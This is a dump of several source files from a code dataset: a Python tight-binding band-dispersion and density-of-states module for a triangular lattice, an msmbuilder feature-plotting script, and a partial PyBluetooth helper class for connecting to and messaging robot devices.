INTEGRATION MEASURES\n print(\"started calculating filling for chemical potential and dispersion parameters TB_single_band..\")\n\n self.Npoi_ints=1000 # 1200 for accurate calculation, 400 for quick\n self.latt_int=Lattice.TriangLattice(self.Npoi_ints, False, Machine) #temp grid for integrating and getting filling\n \n # [KX,KY]=self.latt_int.Generate_lattice()\n [self.KX,self.KY]=self.latt_int.read_lattice()\n Vol_rec=self.latt_int.Vol_BZ()\n self.ds=Vol_rec/np.size(self.KX)\n self.ds2=1/np.size(self.KX)\n\n self.energy_k = self.Disp(self.KX,self.KY)\n \n \n Wbdw=np.max(self.energy_k)-np.min(self.energy_k)\n\n #DISPERSION PARAMS\n self.bandmin=np.min(self.energy_k)\n self.bandmax=np.max(self.energy_k)\n self.bandwidth=Wbdw\n\n #getting chempot for filling\n [self.nn,self.earr,Dos]=self.DOS(size_E)\n self.Dos=Dos/Vol_rec\n indemin=np.argmin((self.nn-fill)**2)\n mu=self.earr[indemin]\n # mu=24\n self.mu=mu\n self.name=\"lattice_disp\"\n\n\n #validating actual filling\n self.EF= self.mu-self.bandmin #fermi energy from the bottom of the band\n self.energy_k_mu = self.Disp_mu(self.KX,self.KY)\n nu_fill=np.sum(np.heaviside(-self.energy_k_mu,1)*self.ds)/Vol_rec\n print(\"finished calculating filling for chemical potential\")\n print(\"Filling: {f} .... 
chemical potential: {m}\".format(f=nu_fill,m=mu))\n \n self.filling=nu_fill\n self.target_fill=fill\n \n [self.dens2,self.bins,self.valt,self.f2 ]=self.DOS_2()\n\n \n def Disp(self,kx,ky):\n [tp1,tp2]=self.hop\n ed=-tp1*(2*np.cos(kx)+4*np.cos((kx)/2)*np.cos(np.sqrt(3)*(ky)/2))\n ed=ed-tp2*(2*np.cos(np.sqrt(3)*(ky))+4*np.cos(3*(kx)/2)*np.cos(np.sqrt(3)*(ky)/2))\n return ed\n\n def Disp_mu(self,kx,ky):\n\n [tp1,tp2]=self.hop\n ed=-tp1*(2*np.cos(kx)+4*np.cos((kx)/2)*np.cos(np.sqrt(3)*(ky)/2))\n ed=ed-tp2*(2*np.cos(np.sqrt(3)*(ky))+4*np.cos(3*(kx)/2)*np.cos(np.sqrt(3)*(ky)/2))\n return ed-self.mu\n\n\n def Fermi_Vel(self,kx,ky):\n\n [tp1,tp2]=self.hop\n sq3y2=np.sqrt(3)*ky/2\n sq3y=np.sqrt(3)*ky\n vx=-tp1*(-2*np.cos(sq3y2)*np.sin(kx/2)-2*np.sin(kx)) +6*tp2*np.cos(sq3y2)*np.sin(3*kx/2)\n vy=2*np.sqrt(3)*tp1*np.cos(kx/2)*np.sin(sq3y2)-2*np.sqrt(3)*tp2*(-np.cos(3*kx/2)*np.sin(sq3y2)-np.sin(sq3y))\n return [vx,vy]\n \n\n\n #if used in the middle of plotting will close the plot\n def FS_contour(self, Np):\n s=time.time()\n print('starting contour.....')\n y = np.linspace(-4,4, 4603)\n x = np.linspace(-4.1,4.1, 4603)\n X, Y = np.meshgrid(x, y)\n Z = self.Disp(X,Y) #choose dispersion\n c= plt.contour(X, Y, Z, levels=[self.mu],linewidths=3, cmap='summer');\n plt.close()\n #plt.show()\n numcont=np.shape(c.collections[0].get_paths())[0]\n \n if numcont==1:\n v = c.collections[0].get_paths()[0].vertices\n else:\n contourchoose=0\n v = c.collections[0].get_paths()[0].vertices\n sizecontour_prev=np.prod(np.shape(v))\n for ind in range(1,numcont):\n v = c.collections[0].get_paths()[ind].vertices\n sizecontour=np.prod(np.shape(v))\n if sizecontour>sizecontour_prev:\n contourchoose=ind\n v = c.collections[0].get_paths()[contourchoose].vertices\n NFSpoints=Np\n xFS_dense = v[::int(np.size(v[:,1])/NFSpoints),0]\n yFS_dense = v[::int(np.size(v[:,1])/NFSpoints),1]\n e=time.time()\n print('finished contour.....', e-s)\n return [xFS_dense,yFS_dense]\n \n def FS_contour_HT(self, Np):\n s=time.time()\n print('starting high res contour.....')\n sizegrid=int(Np/3)\n y = np.linspace(-3,3, sizegrid) #3 is able to capture half filling FS\n x = np.linspace(-3,3, sizegrid) #3 is able to capture half filling FS\n X, Y = np.meshgrid(x, y)\n Z = self.Disp(X,Y) #choose dispersion\n c= plt.contour(X, Y, Z, levels=[self.mu],linewidths=3, cmap='summer');\n plt.close()\n #plt.show()\n numcont=np.shape(c.collections[0].get_paths())[0]\n print('number of sheets.....',numcont)\n if numcont==1:\n v = c.collections[0].get_paths()[0].vertices\n else:\n contourchoose=0\n v = c.collections[0].get_paths()[0].vertices\n sizecontour_prev=np.prod(np.shape(v))\n for ind in range(1,numcont):\n v = c.collections[0].get_paths()[ind].vertices\n sizecontour=np.prod(np.shape(v))\n if sizecontour>sizecontour_prev:\n contourchoose=ind\n v = c.collections[0].get_paths()[contourchoose].vertices\n NFSpoints=Np\n print('contour size and intended span.....',np.size(v[:,1]),NFSpoints,int(np.size(v[:,1])/NFSpoints))\n xFS_dense = v[:,0]\n yFS_dense = v[:,1]\n e=time.time()\n print('finished high res contour.....', e-s)\n return [xFS_dense,yFS_dense]\n \n def FS_contour_HT2(self,Nangles):\n s=time.time()\n print('starting high res contour.....')\n Np=(2**9+1)*40\n print(\"attempting countour of size\",Np)\n sizegrid=int(Np)\n y = np.linspace(-3,3, sizegrid) #3 is able to capture half filling FS\n x = np.linspace(-3,3, sizegrid) #3 is able to capture half filling FS\n X, Y = np.meshgrid(x, y)\n Z = self.Disp(X,Y) #choose dispersion\n c= plt.contour(X, Y, Z, 
levels=[self.mu],linewidths=3, cmap='summer');\n plt.close()\n #plt.show()\n numcont=np.shape(c.collections[0].get_paths())[0]\n print('number of sheets.....',numcont)\n if numcont==1:\n v = c.collections[0].get_paths()[0].vertices\n else:\n contourchoose=0\n v = c.collections[0].get_paths()[0].vertices\n sizecontour_prev=np.prod(np.shape(v))\n for ind in range(1,numcont):\n v = c.collections[0].get_paths()[ind].vertices\n sizecontour=np.prod(np.shape(v))\n if sizecontour>sizecontour_prev:\n contourchoose=ind\n v = c.collections[0].get_paths()[contourchoose].vertices\n\n print('contour size before interpolation.....',np.size(v[:,1]))\n xFS_dense = v[:,0]\n yFS_dense = v[:,1]\n e=time.time()\n print('finished high res contour.....', e-s)\n \n \n angdens=np.arctan2(yFS_dense,xFS_dense)\n #sorting the arrays traversing them from -pi to pi\n list_ang, listx = zip(*sorted(zip(list(angdens), list(xFS_dense) )))\n list_ang, listy = zip(*sorted(zip(list(angdens), list(yFS_dense) )))\n angdens=np.array(list_ang)\n xFS_dense=np.array(listx)\n yFS_dense=np.array(listy)\n \n \n fx = interp1d(angdens, xFS_dense)\n fy = interp1d(angdens, yFS_dense)\n ang=np.linspace(np.min(angdens), np.max(angdens),Nangles)\n print(\"range of angles from marching squares\",np.min(angdens), np.max(angdens))\n \n return [fx(ang),fy(ang)]\n \n def deltad(self,x, epsil):\n return (1/(np.pi*epsil))/(1+(x/epsil)**2)\n\n def DOS(self,size_E):\n\n #DOMAIN OF THE DOS\n minE=self.bandmin-0.001*self.bandwidth\n maxE=self.bandmax+0.001*self.bandwidth\n earr=np.linspace(minE,maxE,size_E)\n\n \n Vol_rec=self.latt_int.Vol_BZ()\n\n\n \n #parameter for delta func approximation\n epsil=0.02*self.bandwidth\n\n ##DOS \n Dos=[]\n for i in earr:\n dosi=np.sum(self.deltad(self.energy_k-i,epsil))*self.ds\n Dos.append(dosi)\n \n de=earr[1]-earr[0]\n Dos=np.array(Dos)\n print(\"norm of Dos,\", np.sum(Dos)*de, self.latt_int.VolBZ)\n \n #FILLING FOR EACH CHEMICAL POTENTIAL\n ndens=[]\n for mu_ind in range(size_E):\n \n N=np.trapz(Dos[0:mu_ind])*de\n ndens.append(N)\n nn=np.array(ndens)\n nn=nn/nn[-1]\n \n print(\"sum of the hist, normed?\", np.sum(Dos)*de)\n\n return [nn,earr,Dos]\n \n def DOS_2(self):\n Ene_BZ=self.energy_k\n \n eps_l=[]\n \n eps_l.append(np.mean( np.abs( np.diff( Ene_BZ.flatten() ) ) )/2)\n eps_a=np.array(eps_l)\n eps=np.min(eps_a)*30\n \n mmin=np.min(Ene_BZ)\n mmax=np.max(Ene_BZ)\n NN=int((mmax-mmin)/eps)+int((int((mmax-mmin)/eps)+1)%2) #making sure there is a bin at zero energy\n binn=np.linspace(mmin,mmax,NN+1)\n valt=np.zeros(NN)\n\n val_p,bins_p=np.histogram(Ene_BZ.flatten(), bins=binn,density=True)\n valt=valt+val_p\n\n \n bins=(binn[:-1]+binn[1:])/2\n \n #taking into account spin\n valt=valt*2\n \n f2 = interp1d(binn[:-1],valt, kind='cubic',bounds_error=False, fill_value=0)\n de=(bins[1]-bins[0])\n print(\"sum of the hist, normed?\", np.sum(valt)*de)\n \n \n \n #FILLING FOR EACH CHEMICAL POTENTIAL\n ndens=[]\n for mu_ind in range(NN):\n N=np.trapz(valt[0:mu_ind])*de\n ndens.append(N)\n nn=np.array(ndens)\n dens2=nn/nn[-1]\n \n \n\n return [dens2,bins,valt,f2 ]\n\n #######random functions\n def nf(self, e, T):\n rat=np.max(np.abs(e/T))\n if rat<700:\n return 1/(1+np.exp( e/T ))\n else:\n return np.heaviside(-e,0.5)\n\n def nb(self, e, T):\n rat=np.max(np.abs(e/T))\n if rat<700:\n return 1/(np.exp( e/T )-1)\n else:\n return -np.heaviside(-e,0.5)\n \n def be_nf(self, e, T):\n rat=np.max(np.abs(e/T))\n if rat<700:\n x=e/T\n return x/(np.exp(x)+1)\n else:\n return np.heaviside(-e,0.5)\n\n def be_nb(self, e, T):\n 
rat=np.max(np.abs(e/T))\n if rat<700:\n x=e/T\n expr=x/(np.exp(x)-1)\n problems=np.where(np.isnan(expr))[0]\n expr[problems]=1\n return expr\n else:\n return -(e/T)*np.heaviside(-e,0.5)\n \n def PlotFS(self, lat):\n l=Lattice.TriangLattice(100,False )\n Npoi=1000\n Vertices_list, Gamma, K, Kp, M, Mp=l.FBZ_points(l.b[0,:],l.b[1,:])\n VV=np.array(Vertices_list+[Vertices_list[0]])\n [KxFS,KyFS]=self.FS_contour(Npoi)\n plt.plot(VV[:,0], VV[:,1],c='k')\n plt.scatter(KxFS, KyFS, s=1, c='r')\n plt.show()\n\n\nclass Dispersion_circ:\n\n def __init__(self, hop, fill, Machine=None):\n\n self.hop=hop\n \n if Machine is None:\n self.Machine = \"\"\n else:\n self.Machine = Machine \n\n #GRIDS AND INTEGRATION MEASURES\n print(\"started calculating filling for chemical potential and dispersion parameters _circ.. \")\n\n self.Npoi_ints=1200\n self.latt_int=Lattice.TriangLattice(self.Npoi_ints, True,Machine) #temp grid for integrating and getting filling\n \n # [KX,KY]=l.Generate_lattice()\n [KX,KY]=self.latt_int.read_lattice()\n Vol_rec=self.latt_int.Vol_BZ()\n ds=Vol_rec/np.size(KX)\n\n energy_k = self.Disp(KX,KY)\n \n \n Wbdw=np.max(energy_k)-np.min(energy_k)\n\n #DISPERSION PARAMS\n self.bandmin=np.min(energy_k)\n self.bandmax=np.max(energy_k)\n self.bandwidth=Wbdw\n\n #getting chempot for filling\n [nn,earr,Dos]=self.DOS(size_E=500, Npoi_ints=1200)\n indemin=np.argmin((nn-fill)**2)\n mu=earr[indemin]\n self.mu=mu\n self.name=\"parabolic_disp\"\n\n\n #validating actual filling\n self.EF= self.mu-self.bandmin #fermi energy from the bottom of the band\n energy_k_mu = self.Disp_mu(KX,KY)\n nu_fill=np.sum(np.heaviside(-energy_k_mu,1)*ds)/Vol_rec\n print(\"finished calculating filling for chemical potential\")\n print(\"Filling: {f} .... chemical potential: {m}\".format(f=nu_fill,m=mu))\n self.filling=nu_fill\n\n \n def Disp(self,kx,ky):\n \n [tp1,tp2]=self.hop\n DD2=0.5*(3*tp1+9*tp2) #multiplied by length squared\n ed=0.5*DD2*(kx**2+ky**2)\n return ed\n\n def Disp_mu(self,kx,ky):\n\n [tp1,tp2]=self.hop\n DD2=0.5*(3*tp1+9*tp2) #multiplied by length squared\n ed=0.5*DD2*(kx**2+ky**2)\n return ed-self.mu\n\n\n def Fermi_Vel(self,kx,ky):\n\n [tp1,tp2]=self.hop\n DD2=0.5*(3*tp1+9*tp2) #multiplied by length squared\n vx=DD2*kx\n vy=DD2*ky\n\n return [vx,vy]\n \n #if used in the middle of plotting will close the plot\n def FS_contour2(self, Np):\n theta = np.linspace(-np.pi,np.pi, Np)\n [tp1,tp2]=self.hop\n m=2/(3*tp1+9*tp2)\n \n kf=np.sqrt(2*self.EF*m)\n\n xFS_dense=kf*np.cos(theta)\n yFS_dense=kf*np.sin(theta)\n return [xFS_dense,yFS_dense]\n \n def FS_contour(self, Np):\n y = np.linspace(-4,4, 10603)\n x = np.linspace(-4,4, 10603)\n X, Y = np.meshgrid(x, y)\n Z = self.Disp_mu(X,Y) \n c= plt.contour(X, Y, Z, levels=[0]);\n plt.close()\n #plt.show()\n numcont=np.shape(c.collections[0].get_paths())[0]\n v = c.collections[0].get_paths()[0].vertices\n \n # if numcont==1:\n # v = c.collections[0].get_paths()[0].vertices\n # else:\n # contourchoose=0\n # v = c.collections[0].get_paths()[0].vertices\n # sizecontour_prev=np.prod(np.shape(v))\n # for ind in range(1,numcont):\n # v = c.collections[0].get_paths()[ind].vertices\n # sizecontour=np.prod(np.shape(v))\n # if sizecontour>sizecontour_prev:\n # contourchoose=ind\n # v = c.collections[0].get_paths()[contourchoose].vertices\n NFSpoints=Np\n chunksize=int(np.size(v[:,0])/NFSpoints)\n\n\n xFS_dense = v[::chunksize,0]\n yFS_dense = v[::chunksize,1]\n \n return [xFS_dense,yFS_dense]\n\n def deltad(self,x, epsil):\n return (1/(np.pi*epsil))/(1+(x/epsil)**2)\n\n def 
DOS(self,size_E, Npoi_ints):\n\n #DOMAIN OF THE DOS\n minE=self.bandmin-0.001*self.bandwidth\n maxE=self.bandmax+0.001*self.bandwidth\n earr=np.linspace(minE,maxE,size_E)\n\n #INTEGRATION LATTICE\n latt_int=Lattice.TriangLattice(Npoi_ints, False, self.Machine) #temp grid for integrating and getting filling\n \n # [KX,KY]=l.Generate_lattice()\n [KX,KY]=latt_int.read_lattice()\n Vol_rec=latt_int.Vol_BZ()\n ds=Vol_rec/np.size(KX)\n\n #DISPERSION FOR INTEGRAL\n energy_k = self.Disp(KX,KY)\n #parameter for delta func approximation\n epsil=0.002*self.bandwidth\n\n ##DOS \n Dos=[]\n for i in earr:\n dosi=np.sum(self.deltad(energy_k-i,epsil))*ds\n Dos.append(dosi)\n\n #FILLING FOR EACH CHEMICAL POTENTIAL\n ndens=[]\n for mu_ind in range(size_E):\n de=earr[1]-earr[0]\n N=np.trapz(Dos[0:mu_ind])*de\n ndens.append(N)\n nn=np.array(ndens)\n nn=nn/nn[-1]\n\n return [nn,earr,Dos]\n\n #######random functions\n def nf(self, e, T):\n rat=np.abs(np.max(e/T))\n if rat<700:\n return 1/(1+np.exp( e/T ))\n else:\n return np.heaviside(-e,0.5)\n\n def nb(self, e, T):\n rat=np.abs(np.max(e/T))\n if rat<700:\n return 1/(np.exp( e/T )-1)\n else:\n return -np.heaviside(-e,0.5)\n\n def PlotFS(self, lat):\n l=Lattice.TriangLattice(100,False )\n Npoi=1000\n Vertices_list, Gamma, K, Kp, M, Mp=l.FBZ_points(l.b[0,:],l.b[1,:])\n VV=np.array(Vertices_list+[Vertices_list[0]])\n [KxFS,KyFS]=self.FS_contour(Npoi)\n plt.plot(VV[:,0], VV[:,1],c='k')\n plt.scatter(KxFS, KyFS, s=1, c='r')\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n \n \ndef main() -> int:\n \n \n \n ##########################\n ##########################\n # parameters\n ##########################\n ##########################\n\n # # #electronic parameters\n J=2*5.17 #in mev\n tp1=568/J #in units of Js\\\n tp2=-tp1*108/568 #/tpp1\n ##coupling \n U=4000/J\n g=100/J\n Kcou=g*g/U\n # fill=0.67 #van hove\n fill=0.5\n size_E=4000\n \n\n ##########################\n ##########################\n # Geometry/Lattice\n ##########################\n ##########################\n\n save=True\n Machine='FMAC'\n \n # ##########################\n # ##########################\n # # Fermi surface and structure factor\n # ##########################\n # ##########################\n\n ed=Dispersion_TB_single_band([tp1,tp2],fill,size_E,Machine)\n [dens2,bins,valt,f2 ]=[ed.dens2,ed.bins,ed.valt,ed.f2 ]\n [nn,earr,Dos]=[ed.nn,ed.earr,ed.Dos]\n mu=ed.mu\n plt.plot(earr,Dos)\n plt.show()\n \n \nif __name__ == '__main__':\n sys.exit(main()) # next section explains the use of sys.exit\n","repo_name":"MendezV/linear_pdcro2","sub_path":"Dispersion.py","file_name":"Dispersion.py","file_ext":"py","file_size_in_byte":17727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74887525280","text":"# Plot features\nfrom msmbuilder.io import load_trajs\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib.pylab import plt\nimport sys\nimport seaborn as sns\ncolors = sns.color_palette(\"colorblind\", 8)\n\nfor feature in ['angles', 'dihedrals', 'bonds', 'contacts']:\n meta, ftraj = load_trajs('featurized_trajectories/{}-ftraj'.format(feature))\n ftraj = np.concatenate([traj for traj in ftraj.values()])\n\n if feature in ['angles', 'dihedrals']:\n sample = ftraj[np.random.choice(ftraj.shape[0], size=10000), :]\n sample = sample[:,np.arange(0,ftraj.shape[1], 2)]\n print(feature, sample.shape)\n elif feature in ['contacts']:\n sample = ftraj[np.random.choice(ftraj.shape[0], size=10000)]\n print(feature, 
sample.shape)\n else:\n sample = ftraj[np.random.choice(ftraj.shape[0], size=10000), :]\n print(feature, sample.shape)\n\n try:\n n_feats_plot = sample.shape[1]\n except IndexError:\n n_feat_plot = 1\n\n # BOX PLOT\n fig, axes = plt.subplots()\n\n axes.boxplot(sample,\n boxprops={'color': colors[0]},\n whiskerprops={'color': colors[0]},\n capprops={'color': colors[0]},\n medianprops={'color': colors[2]},\n )\n axes.set_xlabel(\"Feature Index\", fontsize=16)\n xx = np.arange(0, n_feats_plot, 10)\n axes.set_xticks(xx)\n axes.set_xticklabels([str(x) for x in xx])\n axes.set_xlim((0, n_feats_plot + 1))\n axes.set_ylabel(\"{} Value\".format(feature), fontsize=16)\n plt.savefig(\"figures/{}-features-box.pdf\".format(feature))\n\n variance = sample.var(axis=0)\n fig, axes = plt.subplots()\n try:\n index = np.arange(variance.shape[0])\n except IndexError:\n index = np.array([1])\n\n axes.bar(index, variance, align='center')\n axes.set_xlabel(\"Feature Index\", fontsize=16)\n xx = np.arange(0, n_feats_plot, 10)\n axes.set_xticks(xx)\n axes.set_xticklabels([str(x) for x in xx])\n axes.set_xlim((-0.5, n_feats_plot + 0.5))\n axes.set_ylabel(\"{} Variance\".format(feature), fontsize=16)\n plt.savefig(\"figures/{}-features-var.pdf\".format(feature))\n print('Finished {}'.format(feature))\n","repo_name":"RobertArbon/AADH_Analysis","sub_path":"CHARMM-OMM/MSM_Reactants_Only/All_Features_MSM/plot_features.py","file_name":"plot_features.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15557032731","text":"#!/usr/bin/python\r\nfrom bluetooth import *\r\nimport sys\r\nimport select\r\nimport time\r\n\r\ndef delay(ms):\r\n time.sleep(ms/1000)\r\n\r\n# Create global list of sockets\r\n# If a test program throws an exception and terminates, all handles to open sockets in the class will be lost\r\n# In this case, the only way to severe existing connections (and thus be able to make new ones) is to use this global list\r\n# To sever these connections after a program terminates without disconnecting, call severOldConnections()\r\n# So make sure that whatever file you're actually running includes the statement 'from BluetoothService import *'\r\n# This will ensure that the shell can see the below method after an unexpected termination\r\nglobalSockets = []\r\n\r\n#def severOldConnections():\r\n# for socket in globalSockets[:]:\r\n# socket.close()\r\n# globalSockets.remove(socket) \r\n\r\nclass BluetoothService:\r\n\r\n def __init__(self, enablePrint=True):\r\n self._discoveredDevices = {} # Dictionary mapping addresses to names for discovered devices\r\n self._addedDevices = {} # Dictionary mapping addresses to names for manually added devices\r\n self._sockets = {} # Dictionary mapping addresses to sockets\r\n \r\n def discoverDevices(self):\r\n \"\"\"\r\n Discover available bluetooth devices.\r\n\r\n It seems that if multiple devices are available with the same name, only one of them will be found.\r\n \r\n @return: A dictionary mapping addresses to names of the discovered devices\r\n @rtype: dict{str:str}\r\n \"\"\"\r\n print(\"Discovering Devices ...\")\r\n # Perform multiple discoveries since single scans seem to miss some devices\r\n # and the duration argument of discover_devices doesn't seem to work\r\n # Note discover_devices has a lookup_name argument but it crashes when set to true\r\n devices = {}\r\n addresses = []\r\n for i in range(1):\r\n newAddresses = discover_devices(duration=20) # 8-second 
discovery\r\n for address in newAddresses:\r\n if address not in addresses:\r\n addresses.append(address)\r\n # Look up names from addresses\r\n for address in addresses:\r\n name = ''\r\n try:\r\n name = lookup_name(address, timeout=30)\r\n except IOError:\r\n print('Error looking up name for address <' + str(address) + '>')\r\n devices[address] = name\r\n print(\"Found %d devices:\" % len(devices))\r\n for (address, name) in devices.items():\r\n print(\" <%s> at <%s>\" % (name, address))\r\n self._discoveredDevices = devices\r\n return devices.copy()\r\n\r\n def getDevices(self, nameFilters = ('')):\r\n \"\"\"\r\n Return the known devices (both discovered and manually added).\r\n Optionally, only return ones with names including the given terms.\r\n\r\n Will not perform a new discovery (see L{discoverDevices} for that).\r\n\r\n @param nameFilters: A list/tuple of terms which must be contained (case insensitive) in the returned device names.\r\n @type nameFilters: str or list/tuple or str\r\n\r\n @return: Dictionary mapping addresses to names\r\n @rtype: dict\r\n \"\"\"\r\n res = {}\r\n if not isinstance(nameFilters, (list, tuple)):\r\n nameFilters = [nameFilters]\r\n # Add devices that include the desired terms\r\n allDevices = dict(list(self._discoveredDevices.items()) + list(self._addedDevices.items()))\r\n for address in allDevices.keys():\r\n name = allDevices[address]\r\n for nameFilter in nameFilters:\r\n if name is None or len(name) == 0:\r\n if nameFilter in address:\r\n res[address] = name \r\n else:\r\n if nameFilter.lower() in name.lower():\r\n res[address] = name\r\n if len(nameFilters) == 0:\r\n res[address] = name\r\n return res\r\n\r\n def addDevice(self, address, name=''):\r\n \"\"\"\r\n Add a device to the list of available devices (as if it was discovered).\r\n\r\n @param address: The address of the device, of the format 'XX:XX:XX:XX:XX:XX'\r\n @type address: str\r\n\r\n @param name: The name of the device (optional)\r\n @type name: str\r\n \"\"\"\r\n if not isinstance(address, str) or not isinstance(name, str):\r\n return False\r\n # Try to get the name if none was provided\r\n if len(name) == 0:\r\n try:\r\n name = lookup_name(address)\r\n except IOError:\r\n print('Error looking up name for address <' + str(address) + '> (but will still add the address)')\r\n # Store the new device\r\n self._addedDevices[address] = name\r\n\r\n def clearDevices(self, added=True, discovered=True):\r\n \"\"\"\r\n Clears the known devices.\r\n\r\n @param added: Whether or not to clear the manually added devices (default True)\r\n @type added: boolean\r\n\r\n @param discovered: Whether or not to clear the discovered devices (default True)\r\n @type discovered: boolean\r\n \"\"\"\r\n if added:\r\n self._addedDevices = {}\r\n if discovered:\r\n self._discoveredDevices = {}\r\n\r\n def getAddress(self, name):\r\n \"\"\"\r\n Try to get the device address from the name. 
It must have already been added.\r\n\r\n If an address is given, will just return that address.\r\n\r\n @param address: The device name\r\n @type address: str\r\n\r\n @return: The address of the device, or an empty string if unknown\r\n @rtype: str\r\n \"\"\"\r\n if not isinstance(name, str):\r\n return False\r\n if name.count(':') == 5 and len(name.strip()) == 5 + 6*2:\r\n return name\r\n #print('\\tLooking up address of <%s>' % name)\r\n allDevices = self.getDevices()\r\n if name not in allDevices.values():\r\n print('\\t<%s> has not been discovered or added' % name)\r\n return ''\r\n for address in allDevices:\r\n if allDevices[address] == name:\r\n return address\r\n \r\n def connect(self, device, port=1, enablePrint=True):\r\n \"\"\"\r\n Connect to a device with the given name or address\r\n To use device name, the device must have already been discovered (see L{discoverDevices}).\r\n\r\n The device should already be added to the computer's list of known devices.\r\n The PIN for the device should have been stored on the computer when it was added.\r\n \r\n @param device: The name or address of the device to connect (case sensitive)\r\n @type device: str\r\n @param port: The port to use (optional)\r\n @type deviceName: int\r\n\r\n @return: Whether or not the connection was successful\r\n @rtype: boolean\r\n \"\"\"\r\n if not isinstance(device, str):\r\n return False\r\n if enablePrint:\r\n print('Connecting to <%s>' % device)\r\n # If a name was given, try to get its address\r\n device = self.getAddress(device)\r\n if len(device) == 0:\r\n return False\r\n # Create socket to use for connection (RFCOMM is default argument)\r\n socket = BluetoothSocket()\r\n connected = False\r\n # Try multiple times in case user is slow in following Windows prompt to add device\r\n # also, will try to disconnect and reconnect if already connected (maybe, not sure if this works)\r\n for count in range(4):\r\n if enablePrint:\r\n print('\\tTrying to connect...')\r\n if enablePrint:\r\n print('\\tIf prompted (on Windows), click to add device and enter PIN \\'1234\\'')\r\n try:\r\n socket.connect((device, port))\r\n connected = True\r\n break\r\n except IOError: # Got an error, probably either already connected or not been added to computer\r\n try:\r\n socket.close()\r\n except IOError:\r\n None\r\n socket = BluetoothSocket()\r\n # Check if connection was successful\r\n if connected:\r\n self._sockets[device] = socket\r\n globalSockets.append(socket)\r\n if enablePrint:\r\n print('\\tConnected to ' + device + '!')\r\n return True\r\n else:\r\n print('\\t*** Failed to connect to ' + device + ' ***')\r\n print('\\tPossible solution (on Windows):')\r\n print('\\t -- Open Show Bluetooth Devices')\r\n print('\\t -- Click Add a Device')\r\n print('\\t -- Select the device ' + device)\r\n print('\\t -- Enter PIN 1234')\r\n print('\\t -- Rerun this program') \r\n return False\r\n\r\n def disconnect(self, device, enablePrint=True):\r\n \"\"\"\r\n Disconect from the device with the given name or address. 
Will do nothing if no connection has been made.\r\n\r\n @param device: The name or address of the device to disconnect (case sensitive).\r\n @type device: str\r\n\r\n @return: Whether device was disconnected (whether device was valid)\r\n @rtype: boolean\r\n \"\"\"\r\n if not isinstance(device, str):\r\n return False\r\n if enablePrint:\r\n print('Disconnecting from <' + device + '>')\r\n # If a name was given, try to get its address\r\n device = self.getAddress(device)\r\n if len(device) == 0:\r\n return False\r\n # Disconnect device if a connection is stored\r\n if device not in self._sockets:\r\n return False\r\n socket = self._sockets[device]\r\n socket.close()\r\n del self._sockets[device]\r\n if socket in globalSockets:\r\n globalSockets.remove(socket)\r\n return True\r\n \r\n def send(self, device, message, enablePrint=False):\r\n \"\"\"\r\n Send data to the device with the given name or address.\r\n\r\n @param device: The name or address of the device (case sensitive)\r\n @type device: str\r\n\r\n @param message: The data to send. If it doesn't already end in '\\0', '\\0' will be appended.\r\n @type message: str or something which can be cast to str\r\n\r\n @return: Whether the data was sent.\r\n @rtype: boolean\r\n \"\"\"\r\n if not isinstance(device, str):\r\n return False\r\n if enablePrint:\r\n print('Sending <' + message + '> to <' + device + '>')\r\n message = str(message)\r\n # If a name was given, try to get its address\r\n device = self.getAddress(device)\r\n if len(device) == 0:\r\n return False\r\n # Check that a connection has been made\r\n if device not in self._sockets:\r\n if not self.connect(device):\r\n print('\\tHave not connected to <%s>' % device)\r\n return False\r\n # Check that message is null terminated (seems like this is done automatically in send but just in case)\r\n if message[-1] != '\\0':\r\n message += '\\0'\r\n # Send the message\r\n try:\r\n self._sockets[device].send(message)\r\n return True\r\n except IOError: # Stored socket is not actually open\r\n print('\\tNot connected to <%s>' % device)\r\n del self._sockets[device]\r\n return False\r\n\r\n def read(self, device, timeout=1000, enablePrint=True):\r\n \"\"\"\r\n Read data from the device with the given name or address.\r\n\r\n A connection must already have been made to the device (see L{connect}).\r\n\r\n @param device: The name or address of the device to poll (case sensitive)\r\n @type device: str\r\n\r\n @param timeout: The time to wait for a character before giving up, in milliseconds. 
Default is 1000.\r\n @type timeout: int\r\n\r\n @return: The data that was received, or an empty string if timeout was reached or device was not connected.\r\n @rtpe: str\r\n \"\"\"\r\n if not isinstance(device, str):\r\n return ''\r\n # If a name was given, try to get its address\r\n device = self.getAddress(device)\r\n if len(device) == 0:\r\n return ''\r\n # Check that a connection has been made\r\n if device not in self._sockets:\r\n print('\\tHave not connected to <%s>' % device)\r\n return ''\r\n # Check if there is data available\r\n try:\r\n ready = select.select([self._sockets[device]], [], [], timeout/1000)[0]\r\n except select.error: # Socket is not actually open\r\n print('\\tNot connected to <%s>' % device)\r\n del self._sockets[device]\r\n return ''\r\n # Read data until timeout is reached or data is terminated by null character\r\n # Due to bluetooth module timing, one call to 'read' may only get part of a string\r\n terminated = False\r\n data = ''\r\n timedout = False\r\n startTime = time.time()*1000\r\n while(ready and not terminated and not timedout):\r\n dataBytes = self._sockets[device].recv(1024)\r\n data += dataBytes.decode(\"utf-8\")\r\n if '\\0' in data:\r\n terminated = True\r\n if not terminated:\r\n ready = select.select([self._sockets[device]], [], [], 0.005 + timeout/1000)[0] # timeout arg for select is in seconds\r\n timedout = time.time()*1000 - startTime > timeout\r\n # Return data or empty string depending upon level of success\r\n if len(data) > 0 and terminated:\r\n data = data[0:-1]\r\n if enablePrint:\r\n print('Got data <' + data + '> from <' + device + '>')\r\n return data\r\n elif len(data) > 0 and not terminated:\r\n if enablePrint:\r\n print('Got data <' + data + '> from <' + device + '> but it did not terminate - be careful!')\r\n return data\r\n else:\r\n if enablePrint:\r\n print('Reached timeout trying to read from <' + device + '>')\r\n return ''\r\n\r\n\"\"\"\r\nSome test code...\r\n\"\"\"\r\nif __name__ == '__main__':\r\n bt = BluetoothService()\r\n bt.discoverDevices()\r\n \r\n devices = bt.getDevices()\r\n print('\\nFound devices: ')\r\n for (name, address) in devices.items():\r\n print(\" <%s> at <%s>\" % (name, address))\r\n\r\n robots = bt.getDevices(('robot', 'hc-', 'linvor','20:13:12:02:18:92'))\r\n print('\\nFound robot devices: ')\r\n toConnect = ''\r\n for (address, name) in robots.items():\r\n print(\" <%s> at <%s>\" % (name, address))\r\n toConnect = address\r\n\r\n ticker=0\r\n\r\n if bt.connect(toConnect):\r\n 